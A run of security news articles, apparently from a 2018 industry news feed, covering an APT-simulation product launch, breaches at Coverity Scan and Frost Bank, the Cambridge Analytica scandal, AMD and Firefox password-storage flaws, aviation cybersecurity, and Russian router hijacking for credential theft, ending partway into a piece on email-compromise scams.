Israeli Cybersecurity Startup Launches Automated Advanced Persistent Threat (APT) Simulation Platform
Penetration testing is the most effective method of testing whether existing security policy stands up against advanced attackers, but it doesn't scale well to large, dynamic networks, and only provides a single conclusion at a specific point in time. The solution is clearly automation.
XM Cyber is an Israeli firm founded in 2016. Its three co-founders are Tamir Pardo (formerly head of Mossad); Boaz Gorodissky (formerly head of technology for the government of Israel); and Noam Erez (who spent 25 years in Israeli intelligence). Its headquarters are in Israel, but with a presence in the U.S. and Australia. It has customers in Israel, the U.S. and Europe.
Its primary product, an automated APT simulation platform called HaXM, is unveiled today. The product simulates the possible behavior of an attacker in order to locate potential weaknesses on the system; and then, using the data gathered, provides recommendations for the remediation of those weaknesses. In this manner it provides automated red teaming with blue teaming to produce purple teaming at speed, continuously, and at scale.
"The problem we solve," VP of Product Adi Ashkenazy told SecurityWeek, "is that when you look at modern organizations and you see the kind of security stack they have in place, you have to wonder if they are actually securing their critical assets. This is something the companies ask themselves as well. They spend a lot of money on different products and vendors; but at the end of the day, if you ask them, 'are your critical assets secure?', they may have hope and some belief, but they have no concrete evidence to support the idea."
Manual penetration testing to prove the hypothesis of security, he continued, makes no sense for the modern organization that may have tens of thousands of endpoints, and hundreds of subsystems; and is continuously evolving and changing.
"This is why we founded XM Cyber," commented Noam Erez: "to equip enterprises with a continuous 360-degree view of which critical assets are at risk, what security issues they should focus on, and how best to harness their resources to resolve them."
HaXM places sensors only on 'endpoints of interest'. "We don't have to map the entire network," said Ashkenazy. "We deploy our sensors on the endpoints of interest within the infrastructure that hackers are able or likely to use. We try to be almost religious in the way we mimic attacks -- we don't put sensors on every endpoint."
Nor does HaXM start with any preconceived idea of a potential attack. "We don't define the attack vectors in advance," he said. "We act like a virtual hacker. We start from points of likely breach -- which could be internet-facing servers, for example; or endpoints that receive external email. We place our virtual hacker in those starting points with a tool box that mimics the capabilities of an advanced attacker; and from that moment on the virtual hacker mimics the steps taken by a real hacker trying to find his way to critical assets. We never know in advance what will be found, but so far the virtual hacker has always eventually managed to compromise the entire network."
This is HaXM's simulation mode, where great care is taken not to trigger any alarms from the customer's existing security stack. It checks for the conditions that could be used by an attacker. "This is what we use for 24/7 testing. But we also have a validation mode," added Ashkenazy. "When you switch to validation mode, this is not continuous, but is a controlled mode, where you specify when and where you want to actually test a specific attack vector -- and then we conduct the malicious activities to their full extent so that you can check the security stack in its entirety."
HaXM provides a visualization of the route an aggressor can take from initial entry point on a network to the company's critical assets. In doing this, it definitively presents the existence or absence of sufficient security, highlighting if and where additional security is necessary. While many security products seek to find indications of actual compromise after an initial breach, XM Cyber's approach is to find routes of potential compromise irrespective of an existing breach. It will not locate an attacker; but it will tell the customer what an attacker could achieve.
XM Cyber has offices in Herzliya, Israel; New York; and Sydney, Australia. It has raised $15 million as initial funding in its first two years. The product will be demonstrated at the RSA Conference in San Francisco, California in April 16-19, 2018.
Many oil and gas companies in the Middle East reported suffering at least one serious security incident in the past year, according to a study conducted by Ponemon Institute on behalf of German industrial giant Siemens.
Nearly 200 individuals responsible for overseeing cybersecurity risk in oil and gas companies in the Middle East have taken part in the study and the results show that many organizations are unprepared to address the risks faced by their operational technology (OT) networks.
According to Siemens, three-quarters of respondents said their organizations had suffered at least one security incident that resulted in disruption to operations in their OT environment or loss of confidential information in the past 12 months. Eleven percent of respondents said they had experienced more than 10 OT network intrusions, and nearly half believe they may not be aware of all breaches.
Roughly two-thirds of the individuals who took part in the survey believe the risk of attacks on industrial control systems (ICS) has increased considerably over the past few years, and 60 percent say there is a greater risk to OT environments compared to IT.
Outdated and ageing control systems pose a serious risk, according to 42 percent of respondents. The areas most at risk in Middle Eastern oil and gas companies are believed to be exploratory information, production information, potential partners, financial and organizational reports, operational data, information on drilling sites, and field production data collected by sensors.
While insider threats are the main concern, only 21 percent of respondents are concerned about malicious insiders, while 68 percent are more worried about the cybersecurity impact of careless employees.
Companies appear aware of the risks, but many of them are not prepared to deal with them. Less than half of respondents say they continually monitor their entire infrastructure, and only a quarter are confident in their ability to address security risks and allocate the resources necessary for addressing them. On average, companies have allocated only a third of their cybersecurity budget to protecting OT environments, the report shows.
Siemens says many organizations are still attempting to air gap their ICS environments in an effort to mitigate threats, but only 39 percent plan on hardening endpoints, and 20 percent plan on adopting analytics solutions over the next year.
Cyberattacks on oil and gas and petrochemical companies can have a devastating impact. Researchers discovered recently a piece of malware that leveraged a zero-day vulnerability in Schneider Electric’s Triconex Safety Instrumented System (SIS). The attack is said to have targeted a petrochemical company in Saudi Arabia and one of the main suspects is Iran. According to some reports, the attackers may have been trying to trigger a deadly explosion at the targeted plant.
Moscow - Russia's Supreme Court on Tuesday ruled the popular Telegram messenger app must provide the country's security services with encryption keys to read users' messaging data, agencies reported.
Media watchdog Roskomnadzor instructed Telegram to "provide the FSB with the necessary information to decode electronic messages received, transmitted, or being sent" within 15 days, it said on its website.
Telegram had appealed against an earlier ruling that it must share this information, but this appeal was rejected on Tuesday.
If it does not provide the keys it could be blocked in Russia.
The free instant messaging app, which lets people exchange messages, photos and videos in groups of up to 5,000 people, has attracted more than 100 million users since its launch in 2013.
Telegram's self-exiled Russian founder Pavel Durov said in September 2017 the FSB had demanded backdoor access.
When Telegram did not provide the encryption keys, the FSB launched a formal complaint.
Durov wrote last year that the FSB's demands are "technically impossible to carry out" and violate the Russian Constitution which entitles citizens to privacy of correspondence.
Tuesday's ruling is the latest move in a dispute between Telegram and the Russian authorities as Moscow pushes to increase surveillance of internet activities.
Last June, Russia's state communications watchdog threatened to ban the app for failing to provide registration documents. Although Telegram later registered, it stopped short of agreeing to its data storage demands.
Companies on the register must provide the FSB with information on user interactions.
From this year they must also store all the data of Russian users inside the country, according to controversial anti-terror legislation passed in 2016 which was decried by internet companies and the opposition.
Coverity Scan, a free service used by tens of thousands of developers to find and fix bugs in their open source projects, was suspended in February after hackers breached some of its servers and abused them for cryptocurrency mining.
Synopsys, which acquired Coverity in 2014, started notifying Coverity Scan users about the breach on Friday. The company said malicious actors gained access to Coverity Scan systems sometime in February.
“We suspect that the access was to utilize our computing power for cryptocurrency mining,” Synopsys told users. “We have not found evidence that database files or artifacts uploaded by the open source community users of the Coverity Scan service were accessed. We retained a well-known computer forensics company to assist us in our investigation.”
Synopsys says the service is now back online and it believes the point of access leveraged by the attackers has been closed. In order to regain access to Coverity Scan, users will need to reset their passwords.
“Please note that the servers in question were not connected to any other Synopsys computer networks. This should have no impact on customers of our commercial products, and this event did not put any Synopsys corporate data or intellectual property at risk,” users were told.
Cybercriminals have become increasingly interested in making a profit by hacking PCs and servers and abusing them to mine cryptocurrencies. Cryptocurrency mining malware can target a wide range of devices, including industrial systems.
One recent high-profile victim was the carmaker Tesla, whose Kubernetes pods were compromised and used for cryptocurrency mining. According to RedLock, which discovered the breach, hackers gained access to Tesla’s Kubernetes console due to the lack of password protection.
Facebook's chief of security late Monday said his role has shifted to focusing on emerging risks and election security at the global social network, which is under fire for letting its platform be used to spread bogus news and manipulate voters.
Alex Stamos revealed the change in his role at work after a New York Times report that he was leaving Facebook in the wake of internal clashes over how to deal with the platform being used to spread misinformation.
"Despite the rumors, I'm still fully engaged with my work at Facebook," Stamos said in a message posted at his verified Twitter account.
"It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security."
Stamos advocated investigating and revealing manipulation of news at the social network by Russian entities, to the chagrin of chief operating officer Sheryl Sandberg and other top executives, the Times reported, citing unnamed current and former employees.
Stamos reportedly decided in December he was done with Facebook, but remained at the social network as part of a plan to smoothly hand his job off to a successor. Neither Facebook nor Stamos directly commented on how long he intended to remain at the company, referring to his tweet in response to queries.
Word from Stamos came as the California-based social media giant faced an onslaught of criticism at home and abroad over revelations that a firm working for Donald Trump's presidential campaign harvested and misused data on 50 million members.
Calls for investigations came on both sides of the Atlantic after Facebook responded to the explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British firm hired by Trump's 2016 campaign.
Vera Jourova, the European commissioner for justice, consumers and gender equality, called the revelations "horrifying, if confirmed," and vowed to address concerns in the United States this week.
In Britain, parliamentary committee chair Damian Collins said both Cambridge Analytica and Facebook had questions to answer.
According to a joint investigation by the Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through a personality prediction app downloaded by 270,000 people, but also scooped up data from friends.
A Cambridge Analytica statement denied misusing Facebook data for the Trump campaign.
Facebook said it had hired a digital forensics firm to examine how the data leak occurred and to ensure that any data collected had been destroyed.
An undercover investigation of Cambridge Analytica by Britain's Channel 4 found executives boasted they could entrap politicians in compromising situations with bribes and Ukrainian sex workers, and spread misinformation online.
The executives claimed to have worked in more 200 elections across the world, including Argentina, the Czech Republic, India, Kenya and Nigeria. The British firm said it "strongly denies" the claims from Channel 4 as well as reports on misuse of Facebook data.
Frost Bank, a subsidiary of Cullen/Frost Bankers, Inc., announced on Friday that it discovered the unauthorized access to images of checks stored electronically.
According to the company, it discovered last week that a third-party lockbox software program had been compromised, resulting in unauthorized users being able to view and copy images of checks stored electronically in the image archive. Frost Bank systems weren’t impacted in the incident, Frost says.
Customers can use lockbox services to send payments to a central post office box. The bank receives the payments and credits them directly to a business’s account.
The information that was accessed as part of the incident could be used to forge checks, the company says.
The company says it stopped the identified unauthorized access immediately after discovering it, and that it also launched an investigation into the matter. Frost says it is working with an unnamed cybersecurity firm to investigate the incident and that the law-enforcement authorities have been informed as well.
“At Frost, we care deeply about taking care of our customers and protecting their information, and we regret that this situation has occurred. We are working very hard to make things right,” Frost Chairman and CEO Phil Green said in a statement.
According to the company, the unauthorized access was limited to a software program serving around 470 commercial customers using the electronic lockbox. The fraction of impacted Frost customer base might experience forgeries on accounts or could be informed of compromised check images.
[UPDATE] Facebook shares plunged Monday as the social media giant was pounded by criticism at home and abroad over revelations that a firm working for Donald Trump's presidential campaign harvested and misused data on 50 million members.
Calls for investigations came on both sides of the Atlantic after Facebook responded to explosive reports of misuse of its data by suspending the account of Cambridge Analytica, a British firm hired by Trump's 2016 campaign.
Democratic Senator Amy Klobuchar and Republican John Kennedy called for Facebook chief Mark Zuckerberg to appear before Congress, along with Google and Twitter's CEOs.
The lawmakers said the companies "have amassed unprecedented amounts of personal data" and that the lack of oversight "raises concerns about the integrity of American elections as well as privacy rights."
Facebook's chief of security Alex Stamos said his role has shifted to focusing on emerging risks and election security at the global social network.
Stamos revealed the change after The New York Times reported that he was leaving Facebook in the wake of internal clashes over how to deal with the platform being used to spread misinformation.
"Despite the rumors, I'm still fully engaged with my work at Facebook," Stamos said in a message posted on his verified Twitter account.
"It's true that my role did change. I'm currently spending more time exploring emerging security risks and working on election security."
Stamos advocated investigating and revealing manipulation of news at the social network by Russian entities, to the chagrin of other top executives, the Times reported, citing unnamed current and former employees.
- Profiles weaponized? -
Senator Ron Wyden asked Facebook to provide more information on what he called a "troubling" misuse of private data that could have been used to sway voters.
Wyden said he wants to know how Cambridge Analytica used Facebook tools "to weaponize detailed psychological profiles against tens of millions of Americans."
In Europe, officials voiced similar outrage.
Vera Jourova, the European commissioner for justice, consumers and gender equality, called the revelations "horrifying, if confirmed," and vowed to address concerns in the United States this week.
According to a joint investigation by The New York Times and Britain's Observer, Cambridge Analytica was able to create psychological profiles on 50 million Facebook users through the use of a personality prediction app that was downloaded by 270,000 people, but also scooped up data from friends.
Cambridge Analytica denied misusing Facebook data for the Trump campaign.
Elizabeth Denham, Britain's Information Commissioner who regulates the sector in the country, announced her office would seek a court warrant on Tuesday to search Cambridge Analytica's computer servers.
She said the company had been "uncooperative" to requests for access to its records and missed a Monday deadline stipulated.
Meanwhile, Facebook said it has hired a digital forensics firm to examine how the data leak occurred and to ensure that any data collected had been destroyed.
Facebook shares skidded 6.8 percent by the close of the Nasdaq on concerns about pressure for new regulations that could hurt its business model.
Shares slipped another percent or so to $170 in after-market trades.
The sell-off spread to other technology giants on Wall Street including Apple, Google-parent Alphabet and Netflix. Asian markets extended the losses, with Tokyo-listed Sony down, Samsung falling in Seoul and Tencent retreating in Hong Kong.
'Self-regulation not working'
Jennifer Grygiel, a Syracuse University professor who studies social media, said the disclosures will increase pressure to regulate Facebook and other social media firms, already under scrutiny for allowing disinformation from Russian-directed sources to propagate.
"Self-regulation is not working," Grygiel said.
Daniel Kreiss, a professor of media and communications at the University of North Carolina, said Facebook failed to live up to its responsibilities on election ads.
"The fact that Facebook seems to make no distinction between selling sneakers and selling a presidential platform is a deep problem," Kreiss said.
Brian Wieser at Pivotal Research maintained that the revelations highlight "systemic problems at Facebook," but that they won't immediately impact the social network's revenues.
David Carroll, a media professor at the Parsons School of Design, said Facebook and others will soon be forced to live with new privacy rules such as those set to take effect in the European Union.
"Facebook and Google will have to ask users a lot more permission to track them," Carroll said. "Most people are going to say no, so I think it's going to have a huge impact on these companies."
Carroll has filed a legal action in Britain calling on Cambridge Analytica to disclose what data was gathered and used on him.
An undercover investigation of Cambridge Analytica by Britain's Channel 4 said executives boasted they could entrap politicians in compromising situations with bribes and Ukrainian sex workers, and spread misinformation online.
The executives claimed to have worked in more 200 elections across the world, including Argentina, the Czech Republic, India, Kenya and Nigeria.
The British firm said it "strongly denies" the claims from Channel 4 as well as reports on misuse of Facebook data.
"Facebook data was not used by Cambridge Analytica as part of the services it provided to the Donald Trump presidential campaign," a statement read.
Another cybersecurity firm has independently confirmed some of the AMD processor vulnerabilities discovered by Israel-based CTS Labs, but the controversial disclosure has not had a significant impact on the value of the chip giant’s stock.
CTS Labs last week published a brief description of 13 allegedly critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The company says the flaws can be exploited for arbitrary code execution, bypassing security features (e.g. Windows Defender Credential Guard, Secure Boot), stealing data, helping malware become resilient against security products, and damaging hardware.
The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges to the targeted machine — physical access is not required. The security firm will not disclose technical details any time soon in order to prevent abuse.
CTS Labs, which no one heard of until last week, came under fire shortly after its disclosure for giving AMD only a 24-hour notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method.
While initially many doubted CTS Labs’ claims due to the lack of technical information, an increasing number of independent researchers have confirmed that the vulnerabilities do in fact exist. Nevertheless, there are still many industry professionals who believe their severity has been greatly exaggerated.
Trail of Bits was the first to independently review the findings. The company, which has been paid for its services, has confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.”
“Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits said in a blog post.
On Monday, Check Point also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.”
“In our opinion the original CTS Labs report might have been problematically phrased in a way that misrepresented the threat model and impact that the RYZENFALL-1 and RYZENFALL-3 vulnerabilities present,” Check Point said in a blog post. “However, problematic phrasing aside, after inspecting the technical details of the above, we can indeed verify that these are valid vulnerabilities and the risks they pose should be taken under consideration.”
Alex Ionescu, a reputable researcher and Windows security expert, also confirmed the findings and warned that “admin-level access and persistence are legitimate threats in multi-tenant IaaS and even things such as VTL0/1 (Credential Guard) when firmware and chipset trust boundaries are broken.”
AMD is investigating the claims, but it has yet to make any statement regarding the impact of the flaws.
Less than an hour after CTS Labs released its report, a controversial company named Viceroy Research published what it described as an “obituary” in hopes of leveraging the findings to short AMD stock. Since CTS’s report also included a disclaimer noting that the company had a financial interest, many assumed the two were working together to short AMD.
While CTS has avoided answering questions regarding its financial interests, Viceroy representatives told Vice’s Motherboard that the company obtained the report describing the vulnerabilities from an “anonymous tipster” and claimed to have no connection to the security firm.
Viceroy’s attempt has had an insignificant impact on AMD stock and experts doubt the situation will change. This is not actually surprising considering that Intel was hit the hardest by Meltdown and Spectre — critical vulnerabilities disclosed by reputable researchers — and still the impact on the company’s stock has been only minor and temporary.
Recovering Encrypted Firefox Passwords via Brute Force Attacks is Easy, Developer Says
Firefox does a poor job at securing stored passwords even if the user has set up a master password, a software developer claims.
According to Wladimir Palant, author of the popular Adblock Plus extension, the password manager in Firefox and Thunderbird needs some major improvements in terms of security. The manager can spill out passwords in less than a minute, he says.
The issue, Palant claims, resides in the manner in which the manager converts a password into an encryption key. The operation is performed by thesftkdb_passwordToKey() function, which applies SHA-1 hashing to a string consisting of a random salt and the actual master password.
In the current implementation, the SHA-1 function has a very low iteration count of 1, meaning that it falls way behind what’s considered a minimum value in practice, namely 10,000. In fact, an iteration count of at least 1,000 was considered “modest” decades ago.
Because of that, recovering encrypted passwords via brute force attacks is not difficult at all, Palant says. In fact, he underlines that graphics processing units (GPUs) are great at calculating SHA-1 hashes. With some of them capable of calculating billions of SHA-1 hashes per second, it would not take more than a minuteto crack the passwords encrypted and stored in Firefox.
This NSS bug was firstreported about nine years ago, but remains unpatched. And it wouldn’t even be that difficult to address the issue, the developer says.
“NSS library implements PBKDF2 algorithm which would slow down bruteforcing attacks considerably if used with at least 100,000 iterations. Of course, it would be nice to see NSS implement a more resilient algorithm like Argon2 but that’s wishful thinking seeing a fundamental bug that didn’t find an owner in nine years,” Palantnotes.
Robert Relyea, who has worked for over 20 years on NSS,notes that, while the iteration count could be increased, it would not affect the security of old databases, which would remain readable. Only changing the master password (even to the same password) for them would also increase the iteration count.
The issue was thought resolved in PKCS #12, but it wasn’t fixed for the NSS database password (Firefox Master Password) too. Thus, Relyea reopened the bug, so it could be properly addressed.
Mozilla is also working on a new password manager component for Firefox. DubbedLockbox and available as an extension, it might not solve the issue either, Palant says, pointing out that it relies on Firefox Accounts, which could prevent wide adoption.
Even if this issue still exists in Firefox, setting up a master password for Firefox’ manager is still better than using none. Of course, using a password manager that isn’t impacted by such bugs is even better, although cracking firmswould say that the security of such tools is debatable.
Aviation, as part of the transportation sector, falls within the critical infrastructure. While it may not have the same security issues as ICS/SCADA-based manufacturing and utilities, it has certain conceptual similarities; including, for example, a vital operational technology infrastructure with increasing internet connectivity, and the associated cyber risks.
It also has one major difference -- the close physical proximity of its own customers. Catastrophic failure in the aviation industry has a more immediate and dramatic effect on customers -- and for this reason alone, a trusted brand image is an essential and fragile part of success in the aviation industry. Without customer trust, customers will not fly with a particular airline.
Historically, aviation security has primarily focused on physical safety, and has become highly efficient in this area. But in recent years, the customization of new aircraft to provide newer and unique passenger experiences -- such as the latest in internet-connected in-flight entertainment systems -- has added a new cyber risk.
Matthieu Gualino, deputy director of the International Civil Aviation Organization Aviation Security Training Center, described the three current areas of cyber risk as flight control (the critical systems needed to fly the aircraft -- high impact, low likelihood); the operational cabin (systems used to operate and maintain aircraft -- medium impact, medium likelihood); and passengers (systems with direct passenger interaction -- low impact, high likelihood).
The problem today is that aviation security is experienced in operational technology, security and safety; but less experienced in the rapidly evolving world of cyber security. To help counter this risk, Finland's F-Secure has launched its new Aviation Cyber Security Services to help secure not just aircraft, but the entire aviation industry: aircraft, infrastructure, data, and -- most importantly to F-Secure -- reputation. Customers are unlikely to fly with companies they do not trust; and successful cyber-attacks rapidly eliminate customer trust and confidence; even, suggests F-Secure, a minor breach of something like an in-flight entertainment system.
"Off-the-shelf communication technologies are finding their way into aircraft, which makes security much more complicated than in the past," said Hugo Teso, head of aviation cybersecurity services at F-Secure and a former pilot. "Because these off-the-shelf technologies weren't necessarily created to meet the rigorous safety requirements of airlines, the aviation industry is making cyber security a top priority. But they need a partner that understands both cyber security and the details of airline operations, because it's an industry where those details make a big difference."
The new service integrates security assessments of avionics, ground systems and data links, vulnerability scanners, security monitoring, incident response services, and specialized cyber security training for staff.
The primary problem is not unknown to the security industry -- the need to protect safety-critical systems from less significant but more exposed and vulnerable systems (such as those with an internet connection). "A key protection measure is separating systems into different 'trust domains'," explains F-Secure's head of Hardware Security Andrea Barisani, "and then controlling how systems in different domains can interact with one another. This prevents security issues in one domain, like a Wi-Fi service accessible to passengers, from affecting safety-critical systems, like aircraft controls or air to ground datalinks."
Data diodes are typically used for this type of system segmentation, because they provide unidirectional data flows where complete bidirectional isolation is not possible. "It is essential for any data diode to be implemented in a manner that allows no attack, parsing errors or ambiguities, failures to affect their correct operation," Barisani told SecurityWeek. "Our team is routinely involved in testing data diode security to provide assurance on their operation, improve their design and fix any issues well before their certification."
Diodes are part of the separation of the vulnerable passenger facilities from the critical flight operations. "In-flight entertainment and connectivity (IFE/IFC) are two of the most exposed systems in modern aircraft," explained Teso. "Facing directly the passengers, those systems are a major cyber security concern to any operator as any incident would have important brand damage for them. Not to safety though. Due to the way aircraft are designed, built and upgraded any incident involving or originating in the cabin of the airplane will be isolated from the most critical, and safety related, systems."
F-Secure is keen not to promote its new service with the 'fear factor'. The aviation industry already does an excellent job at maintaining the safety of its flights. The new cyber risk is currently primarily against aviation's brand reputation, and the threat of a cyber hijack taking over an aircraft in flight, is, suggests Teso, more likely in the movies than in reality.
But that doesn't mean it can be dismissed or forever ignored, or even limited to civil aviation. The aviation industry, including both civil and military aircraft, shares a common core of technologies, although the threat model differs between the two. Nevertheless, commented Teso, "F-Secure aviation cyber security services is not limited to any specific part of the aviation industry. If it's part of Aviation, our services have it covered."
Related: Poland Eyes Cybersecurity in Skies
At the center of a scandal over alleged misuse of Facebook users' personal data, Cambridge Analytica is a communications firm hired by those behind Donald Trump's successful US presidential bid.
An affiliate of British firm Strategic Communication Laboratories (SCL), Cambridge Analytica has offices in London, New York, Washington, as well as Brazil and Malaysia.
Here's the story behind the company using data to fuel political campaigns:
What does Cambridge Analytica do?
The company boasts it can "find your voters and move them to action" through data-driven campaigns and a team including data scientists and behavioural psychologists.
"Within the United States alone, we have played a pivotal role in winning presidential races as well as congressional and state elections," with data on more than 230 million American voters, Cambridge Analytica claims on its website.
Speaking to TechCrunch in 2017, CEO Alexander Nix said the firm was "always acquiring more" data. "Every day we have teams looking for new data sets," he told the site.
Who are the company's clients?
As well as working on the election which saw Trump reach the White House, Cambridge Analytica has been involved in political campaigns around the world.
In the US, analysts harnessed data to generate thousands of messages targeting voters through their profiles on social media such as Facebook, Snapchat, or the Pandora Radio streaming service.
British press have credited Cambridge Analytica with providing services to pro-Brexit campaign Leave.EU, but Nix has denied working for the group.
Globally, Cambridge Analytica said it has worked in Italy, Kenya, South Africa, Colombia and Indonesia.
What has the company been accused of?
According to the New York Times and Britain's Observer newspapers, Cambridge Analytica stole information from 50 million Facebook users' profiles in the tech giant's biggest-ever data breach, to help them design software to predict and influence voters' choices at the ballot box.
University of Cambridge psychologist Aleksandr Kogan created a personality prediction test app, thisisyourdigitallife, which was downloaded by 270,000 people.
The tool allowed Kogan to access information such as content Facebook users had "liked" and the city they listed on their profile, which was then passed to SCL and Cambridge Analytica.
The Observer reported the app also collected information from the Facebook friends of people who had taken the test.
Christopher Wylie, a former Cambridge Analytica employee, worked with Kogan and told Canadian television channel CBC the company used "private data they acquired without consent".
Who else is involved?
US hedge fund billionaire Robert Mercer -- and major Republican party donor -- bankrolled Cambridge Analytica to the tune of $15 million (12 million euros).
The Observer said it was headed at the time by Steve Bannon, a top Trump adviser until he was fired last summer.
How has Facebook responded?
Facebook suspended SCL and Cambridge Analytica, as well as Kogan and Wylie. In explaining its decision on Friday, the social media giant said the thisisyourdigitallife app was legitimate, but accused Kogan of subsequently violating Facebook's terms by passing the data on to SCL/Cambridge Analytica.
Facebook said it found out what had happened in 2015 and was told all parties involved had deleted the data.
"The claim that this is a data breach is completely false," Facebook said in a new statement on Saturday, saying app users knowingly provided their information.
A cyberespionage group believed to be operating out of Russia hijacked a Cisco router and abused it to obtain credentials that were later leveraged in attacks targeting energy companies in the United Kingdom, endpoint security firm Cylance reported on Friday.
The United States last week announced sanctions against Russian spy agencies and more than a dozen individuals for trying to influence the 2016 presidential election and launching cyberattacks, including the NotPetya attack and campaigns targeting energy firms. Shortly after, US-CERT updated an alert from the DHS and FBI to officially accuse the Russian government of being responsible for critical infrastructure attacks launched by a threat actor tracked as Dragonfly, Crouching Yeti and Energetic Bear.
A warning issued last year by the UK’s National Cyber Security Centre (NCSC) revealed that hackers had targeted the country’s energy sector, abusing the Server Message Block (SMB) protocol and attempting to harvest victims’ passwords.
An investigation conducted by Cylance showed that the attacks were likely carried out by the Dragonfly group. The security firm has observed a series of phishing attacks aimed at the energy sector in the UK using two documents claiming to be resumes belonging to one Jacob Morrison.
When opened, the documents fetched a template file and attempted to automatically authenticate to a remote SMB server controlled by the attackers. This template injection technique was detailed last year by Cisco Talos following Dragonfly attacks on critical infrastructure organizations in the United States.
When a malicious document is opened using Microsoft Word, it loads a template file from the attacker’s SMB server. When the targeted device connects to the SMB server, it will attempt to authenticate using the current Windows user’s domain credentials, basically handing them over to the attackers.
In a separate analysis of such attacks, Cylance noted that while the credentials will in most cases be encrypted, even an unsophisticated attacker will be able to recover them in a few hours or days, depending on their resources.
According to Cylance, Dragonfly used this technique to harvest credentials that were later likely used to hack the systems of energy sector organizations in the United Kingdom.
One interesting aspect noticed by Cylance researchers is that the IP address of the SMB server used in the template injection attack was associated with a major state-owned energy conglomerate in Vietnam. Specifically, the IP corresponded to a core Cisco router that had reached end-of-life.
“The use of compromised routing infrastructure for collection or command and control purposes is not new, but its detection is relatively rare,” Cylance researchers explained. “That’s because the compromise of a router very likely implicates the router’s firmware and there simply aren’t as many tools available to the forensic investigator to investigate them. Analysis is further challenged by the lack of system logs.”
“The fact that the threat actor is using this type of infrastructure is a serious and worrisome discovery, since once exploited, vulnerabilities in core infrastructure like routers are not easily closed or remediated,” they added.
Dragonfly is not the only cyberespionage group to abuse routers in its attacks. A threat actor named Slingshot, whose members appear to speak English, has targeted entities in the Middle East and Africa using hacked Mikrotik routers.
Facebook says it has suspended the account of Cambridge Analytica, the data analysis firm hired by Donald Trump's 2016 presidential campaign, amid reports it harvested the profile information of millions of US voters without their permission.
According to the New York Times and Britain's Observer, the company stole information from 50 million Facebook users' profiles in the tech giant's biggest-ever data breach, to help them design software to predict and influence voters' choices at the ballot box.
Also suspended were the accounts of its parent organization, Strategic Communication Laboratories, as well as those of University of Cambridge psychologist Aleksandr Kogan and Christopher Wylie, a Canadian data analytics expert who worked with Kogan.
Cambridge Analytica was bankrolled to the tune of $15 million by US hedge fund billionaire Robert Mercer, a major Republican donor. The Observer said it was headed at the time by Steve Bannon, a top Trump adviser until he was fired last summer.
"In 2015, we learned that... Kogan lied to us and violated our Platform Policies by passing data from an app that was using Facebook Login to SCL/Cambridge Analytica, a firm that does political, government and military work around the globe," Facebook said in a posting late Friday by its vice president and deputy general counsel Paul Grewal.
Kogan also improperly shared the data with Wylie, it said.
Kogan's app, thisisyourdigitallife, offered a personality prediction test, describing itself on Facebook as "a research app used by psychologists."
Some 270,000 people downloaded the app, allowing Kogan to access information such as the city listed on their profile, or content they had "liked."
"However, the app also collected the information of the test-takers' Facebook friends, leading to the accumulation of a data pool tens of millions-strong," the Observer reported.
Facebook later pushed back against the claim of a data breach, issuing a fresh statement on Saturday that suggested the misused data was limited to those who voluntarily took the test.
"People knowingly provided their information, no systems were infiltrated, and no passwords or sensitive pieces of information were stolen or hacked," Grewal said.
Cambridge Analytica meanwhile said it was in touch with Facebook "in order to resolve this matter as quickly as possible."
It blamed the misuse of data on Kogan and said it has since deleted all the data it received from a company he founded, Global Science Research (GSR).
"No data from GSR was used by Cambridge Analytica as part of the services it provided to the Donald Trump 2016 presidential campaign," it said.
- 'Targeting their inner demons' -
But Wylie, who later became a whistleblower, told the Observer: "We exploited Facebook to harvest millions of people's profiles. And built models to exploit what we knew about them and target their inner demons. That was the basis that the entire company was built on."
Kogan legitimately obtained the information but "violated platform policies" by passing information to SCL/Cambridge Analytica and Wylie, according to Facebook.
Facebook said it removed the app in 2015 when it learned of the violation, and was told by Kogan and everyone who received the data that it had since been destroyed.
"Several days ago, we received reports that, contrary to the certifications we were given, not all data was deleted," Grewal wrote.
"We are moving aggressively to determine the accuracy of these claims. If true, this is another unacceptable violation of trust and the commitments they made.
"We are suspending SCL/Cambridge Analytica, Wylie and Kogan from Facebook, pending further information."
- British investigation -
Cambridge Analytica, the US unit of British behavioral marketing firm SCL, rose to prominence as the firm that the pro-Brexit group Leave.EU hired for data-gathering and audience-targeting.
The company is facing an investigation by Britain's parliament and regulators over its handling of information.
On Saturday, Britain's information commissioner Elizabeth Denham said: "We are investigating the circumstances in which Facebook data may have been illegally acquired and used.
"It's part of our ongoing investigation into the use of data analytics for political purposes which was launched to consider how political parties and campaigns, data analytics companies and social media platforms in the UK are using and analyzing people's personal information to micro-target voters."
The New York Times meanwhile reported that copies of the data harvested for Cambridge Analytica were still online and that its team had viewed some of the raw data.
Human-powered Intelligence Plays a Critical Role in Defending Against Socially Engineered Attacks
The FBI’s Internet Crime Complaint Center (IC3) declared Business Email Compromise (BEC) the “3.1 billion dollar scam” in 2016, an amount which then grew in the span of one year into a “5 billion dollar scam.” Trend Micro now projects those losses in excess of 9 billion dollars.
It’s an understatement to say BEC scams and the resulting damages are on the rise. But with cybersecurity spending across all sectors at an all-time high, how is such an unsophisticated threat still costing otherwise well-secured organizations billions of dollars?
Unlike the numerous types of attacks that incorporate malware, most BEC scams rely solely on social engineering. In fact, its use of trickery, deception, and psychological manipulation rather than malware is largely why BEC continually inflicts such substantial damages. Since most network defense solutions are designed to detect emails containing malware and malicious links, BEC emails often land directly in users’ inboxes. And when this happens, the fate of an attempted BEC scam is in the hands of its recipient.
Indeed, BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat. Here’s why:
Human-Powered Intelligence Trumps Automation
